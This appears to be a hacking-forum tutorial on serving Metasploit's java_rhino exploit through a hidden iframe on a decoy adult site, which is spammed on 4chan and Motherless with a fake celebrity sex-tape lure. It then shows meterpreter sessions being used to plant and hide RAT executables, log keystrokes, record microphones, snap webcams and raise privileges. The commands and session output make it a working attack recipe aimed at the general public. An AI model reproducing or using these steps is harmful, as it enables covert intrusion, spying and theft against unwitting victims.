Introduction
Ok, The Java-Drive-Bye is dead, simple, its an ineffective way to spread your RATs/Loggers etc but alot of you still insist on cluttering this forum up trying to get java drive byes to work. Im writing this tutorial because there is a better solution, the Java_Rhino exploit. The Java_Rhino exploit is a cross platform, cross browser zero day vulnerability that can be used to exploit remote machines. This tutorial will teach you how to set up the Java Rhino exploit and some of the cool things you can do with the meterpreter payload once your targets have been exploited.
What You Need Before Your Start
A hosting account from x10hosting (Free Website Host) ->
http://x10hosting.com/
Download and install metasploit ->
http://metasploit.com/
You need to know your public IP address ->
http://www.whatsmyip.org/
If you have a router youll need to portforward port 1337 and port 4444 to your local machine.
Metasploit
Ok alot of you were having issues with metasploit, you need to install metasploit then run ./msfupdate.exe to update the exploit database to include the java rhino exploit. Then open msfconsole and run "reload_all" for for the java rhino exploit to become available.
What You Need To Understand
In this tutorial you will set up a small webserver on your local machine on port 1337 that when connected too will launch a malicious Java applet invisibly and exploit the slave. Upon exploitation the slave will connect back to your machine on port 4444 giving you access to the entire machine with the priveledges of the user that has been exploited. This will not work if your behind a router and have not forwarded these port to your local machine, if you havent done this yet stop reading, forward your ports (or connect directly to the internet) and open these ports on your firewall (if your using windows).
Initial Set Up
Ok, to keep this attack invisible i suggest making a mirror site and hosting it on the x10hosting webhosting account you set up in the "What You Need" section of this tutorial, what the website has on it i don't really give a shit. I've been using a facebook knockoff site boasting a Selena Gomez Sex Tape, porn style sites work well for easy victims as i will explain later. So go and set up a site on your x10hosting account, note down your domain name and come back but keep your CPanel open, we will be adding one more peice of code to your sites homepage.
Spoiler of my dummy website - WARNING ADULT
Metasploit Setup
Ok, now we need to set up the Java_Rhino exploit server. So fire up your metasploit console and enter the following commands. Tell metasploit to use the java rhino exploit
use exploit/multi/browser/java_rhino
Set metasploit to run the server on port on 1337 Set the URL of the page that will be doing the exploiting to something more memorably Use a reverse TCP meterpreter payload so we can have fun with the slave Code:
set PAYLOAD java/meterpreter/reverse_tcp
Set the connect back payload to connect back to your public IP Code:
set LHOST {PUT YOUR PUBLIC IP HERE}
Now run the configuration Here is a sample output of what you should see Code:
msf > use exploit/multi/browser/java_rhino
msf exploit(java_rhino) > set SRVPORT 1337
SRVPORT => 1337
msf exploit(java_rhino) > set URIPATH exploit
URIPATH => exploit
msf exploit(java_rhino) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(java_rhino) > set LHOST XXX.XXX.XXX.XXX
LHOST => XXX.XXX.XXX.XXX
msf exploit(java_rhino) > exploit
[*] Exploit running as background job.
[-] Handler failed to bind to XXX.XXX.XXX.XXX:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://0.0.0.0:1337/exploit
[*] Local IP: http://192.168.2.2:1337/exploit
[*] Server started.
msf exploit(java_rhino) >
Ok now your exploit server is listening on port 1337. You just need to get people to connect to it. So edit this following peice of code and put your public IP address in it: Code:
<iframe src="http://[YOURIPHERE]/exploit" width=0 height=0 border=0 size=0></iframe>
So you should end up with something like this: Code:
<iframe src="http://123.123.123.123:1337/exploit" width=0 height=0 border=0 size=0></iframe>
Copy this into the HTML on the dummy website you created on your x10hosting account. So now when ever someone views your dummy website, the iframe will force their browser to invisibly connect to your exploit server and metasploit will run the Java_Rhino exploit against their browser. Brilliant. Getting The Clicks
Ok this is where you need to do the leg work and why i recommeneded using an adult themed dummy website inorder to get clicks. My two personal favrouties that i love to farm with the Java_Rhino exploit are 4chan.org and Motherless.com Go to those sites and in the Motherless boards post a picture of a hot chick and then post some comment about a sexy video on your dummy website and post the link for them to click on. This will get you about 30 minuites of traffic before its either removed or pushed to the bottom of the boards. Do the same with the 4Chan.org adult section, you can copy and paste the post you used on Motherless.com but make sure you upload a picture too to catch peoples attention. Make the post short and to the point so the user reads it and clicks the link. I have been using this: Code:
"Finally someone has found a Selena Gomez sex tape - this is the sexiest thing i have ever seen! -> http://link to my dummy site.com"
Along with one of those photoshopped pictures of a naked selena gomez that google just loves to turn up. In doing this you will get about 1 hours worth of traffic at about 10 clicks a minuite, which is enough for what were doing. Remember for every person that clicks through their browser will be exploited because of the iframe we put on the dummy website. You can test it yourself and visit your dummy website, metasploit should give you some output like this: Code:
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from XXX.XXX.XXX.XXX:42045...
[*] Sending Applet.jar to XXX.XXX.XXX.XXX:42048...
Brilliant, now you need to watch the clicks come rolling in from 4Chan and Motherless from all those porn hungry weirdos. Your screen will fill up with connection attempts quickly and will look like this: Code:
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Sending Applet.jar to 98.20.58.180:50224...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50240...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50241...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50242...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 98.20.58.180:50243...
[*] Sending Applet.jar to 74.36.201.221:61621...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 190.212.80.224:45560...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61587...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 74.36.201.221:61635...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 69.114.123.235:1200...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 77.224.112.18:3785...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 124.182.236.181:62576...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.26.163.72:52602...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 80.141.166.139:51625...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11063...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Sending Applet.jar to 92.12.201.206:11071...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11072...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11073...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11074...
[*] Java Applet Rhino Script Engine Remote Code Execution handling request from 92.12.201.206:11075...
If your not getting connections like this but when you go to your dummy site you get a connection means noone is clicking your link, so you should go back to the boards and post some new more tempting ones. I have also seen people hack sites and put their iframes to a no-ip to get days worth of legitmate traffic into their java rhino exploit, this is just a quick overview but the more places you post/spam your dummy site link the better results youll have. I posted this on a few forums last night and collected over 100 sessions in 2 hours. Dont be disapointed if you only get a few sessions on your first try, its like fishing, you have to find the rigt bait line that works for you. Leave this running for about 5-10 minuties to get your first sessions, Your looking for lines that look like this: Code:
[*] Sending stage (28469 bytes) to 80.176.86.190
[*] Meterpreter session 1 opened (192.168.2.2:4444 -> 80.176.86.190:56358) at Sat Dec 24 16:56:17 +0000 2011
This means a session has been created between you and the slave, you can view all the sessions that have been created by issuing the "sessions" command: Code:
Active sessions
==
Id Type Information Connection
-- ---- -- --
1 meterpreter java/java akoltowski @ ACLAPTOP 192.168.2.2:4444 -> 80.176.86.190:56358
2 meterpreter java/java akoltowski @ ACLAPTOP 192.168.2.2:4444 -> 80.176.86.190:56420
To connect to one of these sessions use the "sessions -i <id>" command - the following example shows my connecting to session number 1: Code:
sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Using Your Sessions
A meterpreter session gives you alot of control over the remote slave. You can snapshot their webcam, spawn a shell, screen shot their computer, log their keystrokes. Here is a full list of all the meterpreter commands you can use to fuck with your slave. You can get this by issuing the "Help" command. Code:
Core Commands
==
Command Description
-- --
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
==
Command Description
-- --
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
==
Command Description
-- --
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
==
Command Description
-- --
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
==
Command Description
-- --
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
==
Command Description
-- --
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
I know alot of you are big into RATing and Botnets. So heres how to upload and execute your server .exe to the remote host. First place your server.exe in the same directory as the msfconsole. You can find this directory at anytime by issuing the "lpwd" command from inside your meterpreter sessions. Next change directory on your slave to C:\Temp by issueing the CD command: By changing directory to the C:\Temp (sometimes lowercase C:\temp) directory ensures we will have the right priveldges to upload and execute our server.exe. Now upload your server.exe: You will get an output that looks like this: Code:
meterpreter > upload server.exe
[*] uploading : server.exe -> server.exe
[*] uploaded : server.exe -> server.exe
Now your server.exe is on the remote host you can check it is there by issuing the "ls" command - some AV's might delete it so its worth checking: Code:
Listing: C:\Temp
==
Mode Size Type Last modified Name
---- ---- ---- -- ----
.. output ommited
100776/rwxrwxrw- 0 fil Sat Nov 19 10:50:28 +0000 2011 1D4F.tmp
100776/rwxrwxrw- 0 fil Tue Nov 22 19:22:00 +0000 2011 24C0.tmp
40776/rwxrwxrw- 0 dir Mon Dec 12 14:18:57 +0000 2011 msohtml1
40776/rwxrwxrw- 0 dir Fri Dec 09 14:39:27 +0000 2011 msohtml
40776/rwxrwxrw- 0 dir Sat Dec 24 16:58:53 +0000 2011 mozilla-media-cache
40776/rwxrwxrw- 0 dir Thu Nov 03 18:23:32 +0000 2011 ia64
40776/rwxrwxrw- 0 dir Thu Nov 03 18:23:32 +0000 2011 server.exe << -- WIN
40776/rwxrwxrw- 0 dir Thu Nov 03 18:23:32 +0000 2011 i386
40776/rwxrwxrw- 0 dir Sat Dec 24 17:00:11 +0000 2011 hsperfdata_akoltowski
40776/rwxrwxrw- 0 dir Sat Dec 24 12:30:20 +0000 2011 WPDNSE
40776/rwxrwxrw- 0 dir Thu Dec 08 16:05:02 +0000 2011 VBE
..output omitted
If it isn't in /Temp then try uploading it the the users documents folder instead, because each user can write and execute to their home directory. You can now execute your server.exe by issuing: Continued on next post
Code:
execute -f server.exe -m -H
The flags will execute it from memory and hide the process from the slave. You can then issue the "screenshot" command to screenshot the users computer to see if their AV detected it: Code:
meterpreter > screenshot
Screenshot saved to: /home/solaris/hFOnwohk.jpeg
Meterpreter will open the screenshot in a webbrowser for you to view, as you can see my slave is watching some sleezy porn video: Screenshot: As you can see their AV has detected the execution so out server is now installed on the remote user, congratulations. Other Fun Things
To get a CMD Shell (usefull) Code:
meterpreter > cd C:\Windows\System32
meterpreter > execute -f cmd.exe -i -H
Log Keystrokes Code:
meterpreter > keyscan_start
(wait 10 mins)
meterpreter > keyscan_dump
meterpreter > keyscan_stop
Record Microphone Code:
meterpreter > record_mic
[*] Starting...
[*] Stopped
Audio saved to: /home/solaris/aabHbPGz.wav
Shutdown The slave Code:
meterpreter > Shutdown
Show the victims webcams Code:
meterpreter > webcam_list
Photo victims webcam Code:
meterpreter > webcam_snap <webcam id>
Get remote system info Code:
meterpreter > sysinfo
Go back and select another session without killing this one Code:
meterpreter > background
meterpreter > sessions
meterpreter > sessions -i <id>
Errors You Will Get
The exploit isn't perfect, you will get errors on certain sessions, here is a common one: Code:
[-] Operation failed: 1
You'll get this when issuing a command that is either wrong, unable to execute on the OS or you dont have the privs for it. The only way i have found to get round this on some hosts is to change to the C:\Temp directory, try again, if that doesn't work issue: Code:
meterpreter > getprivs
meterpreter > ps
(will give you an output of the running processes on the machine, copy the id for the srvhosts.exe process)
meterpreter > merge <the id you just copied>
This will merge the meterpreter process with srvhosts.exe which runs with admin privs so should increase your priveledge level, it works about 20% of the time.